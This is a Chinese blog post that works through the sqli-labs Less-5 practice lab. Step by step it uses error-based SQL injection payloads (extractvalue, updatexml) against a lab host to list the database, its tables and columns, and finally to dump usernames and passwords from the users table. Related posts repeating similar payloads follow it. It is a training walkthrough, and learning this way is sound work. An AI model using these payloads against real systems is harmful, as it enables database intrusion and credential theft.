报错注入_sqli-labs less5 Double Query- Single Quotes- String

最新推荐文章于 2023-12-11 22:17:25 发布
最新推荐文章于 2023-12-11 22:17:25 发布
阅读量2.8k 收藏
点赞数 1
分类专栏: 网络安全 文章标签: sqli sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/123716130
版权

sqli-labs less5 Double Query- Single Quotes- String

?id=1
在这里插入图片描述
无回显

考虑报错注入

(1)判断字符型还是数字型

http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%201–+
在这里插入图片描述

http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%202–+

在这里插入图片描述

字符型而且是单引号闭合

(2)判断字段个数:

http://39.101.162.123:10067/Less-5/?id=1%27%20order%20by%201,2,3,4–+

在这里插入图片描述

所以是3个字段

(3)尝试报错注入

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select version()))) --+

在这里插入图片描述

(4)爆库名:
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select database()))) --+

在这里插入图片描述

XPATH syntax error: ‘~security’

(5)爆表名:
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+

这里特别注意,一定要加limit 0,1 因为报错的信息不止一行,无法回显多行数据

在这里插入图片描述

XPATH syntax error: ‘~emails’

查询剩下的表:
http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1))) --+

在这里插入图片描述

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1))) --+

在这里插入图片描述

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1))) --+

在这里插入图片描述

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 4,1))) --+

在这里插入图片描述

所以一共4个表。

下面对users表进行字段名的查询:

(6)爆字段名:

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1))) --+

XPATH syntax error: '~id’

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1))) --+

XPATH syntax error: '~username’

http://39.101.162.123:10067/Less-5/?id=1’ or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1))) --+

XPATH syntax error: '~password’

三个字段全部爆完:id,username,password

(7)爆数据:

这里就不繁琐的爆了,简单就爆第一个数据

http://39.101.162.123:10067/Less-5/?id=1’or updatexml(1,concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password) from users )),0)or’ --+

这里就爆了第一个数据和部分第二个数据:

在这里插入图片描述

XPATH syntax error: ‘~1:Dumb:Dumb,2:Angelina:I-kill-y’

qq_51550750
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-labs Less-5 Double Query- Single Quotes- String
04-15 212
首先弄一个id出来查看有什么显示出来。 显示上面的内容出来。
sqli-labs练习(五)------GET-Double injection-Single Quotes-String
wkend的博客
04-17 902
按提示,输入id参数1,得到回馈结果,但是没用 输入1',报错 查看报错信息near ''1'' LIMIT 0,1' at line 1 输入参数1'',没有报错, 通过以上过程可以发现,当我们改变参数的时候,回显只有两种结果 1>You are in........... 2> 报错信息 没办法,正确的查询只返回第一种情况,那么只能靠第二种回显结果了,...
sqli-labs】 less5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)...
ajxi63204的博客
01-19 439
双注入查询可以查看这两篇介绍 https://www.2cto.com/article/201302/190763.html https://www.2cto.com/article/201303/192718.html 简而言之就是构造如下的查询,会使得查询结果的一部分通过报错的形式显示出来 select count(*),concat((select version())...
Sqli-labs Less-6 Double Query- Double Quotes- String
04-19 79
打开题目一看,还是输入id,但是输入id一看,跟上一个题目类似什么也没有。 添加单引号测试。也没有任何反应。然后添加双引号测试终于报了错误出来。 看这个错误类型应该是,双引号闭合后 又多了一个双引号导致。 然后尝试报错注入。 /sql/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)%23 查出数据库名称。接下来查看数据表名称。 /sql/Less-6/?id=1" and updatexml(1,conc
sqli-labs-master第五关Less-5 Double Query- Single:方式一
weixin_34365417的博客
11-12 556
由于第三四关和第一第二关大致相同,我就不写了。 接下来来写第五关的第一种方式。 1,目标网站: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 当传递的ID为1的时候提示“you are in” 2,查找注入点: http://127.0.0.1/sqli-labs-master/Le...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQLi-Labs】Less-6 Double Query- Double Quotes- String
xw1995115的博客
11-15 903
本节实现原理和方法和Less-5基本一样,不同的是单引号变双引号,详见【SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - Stringhttps://blog.csdn.net/xw1995115/article/details/121329780?spm=1001.2014.3001.5501 本节复现下注入过程。 1.利用单引号尝试封闭查询语句,发现未报错 2. 利用双引号尝试封闭查询发现报错,因此为双引号封闭的查询语句 ...
sqli-labs】 less59 GET -Challenge -Double Query -5 queries allowed -Variation2 (GET型 挑战 双查询 只允许5次查询 ...
ajxi63204的博客
01-31 107
整型的注入 http://192.168.136.128/sqli-labs-master/Less-59/?id=1 or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23 转载于:https://www.cnblogs.com/omnis/p/8393874.html
Sqlilabs Less 5-6 Double Injection
baynk的博客
02-22 601
Less 5 GET - Double Injection - Single Quotes - String 手工注入 传参后,发现没出现用户名和密码,出现的是You are in...........,奇了怪,先不管了,加个'试试,出现错误回显,near ''1'' LIMIT 0,1' at line 1,这个和之前出现的是一样,单引号闭合,属于字符型注入。 但是发现,即使构造sql语句也没...
Web安全-SQL注入sqli靶场第11-14关】(三)
最新发布
12-11 1023
Web安全-SQL注入sqli靶场第11-14关】
MYSQL注入之XPATH语法错误报错扩展
cyynid的博客
06-05 752
但是对于此类报错来说,其报错函数并不止上述提供的两个,不同的数据库版本有不同的报错函数,本文提供一个自动化脚本,可以自动化的检测各个版本的Xpath报错函数,其原理非常简单,就是通过爬虫爬取mysql官方文档的函数内容,构造报错输入,进行测试,来实现自动化的报错函数检测。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 501
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学与技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
PageHelper分页只会作用于第一次查询,对第二次及以后的查询无效
LiZhen314的博客
07-26 3219
serviceImpl中进行多次查询。controller中使用分页。
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 663
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
Xpath报错注入(extractvalue和updatexml)
石页
03-25 1275
updatexml() 函数报错注入原理 updatexml() 函数定义 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; updatexml() 函数运行机制 该函数对XPath_string进行查询操作
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值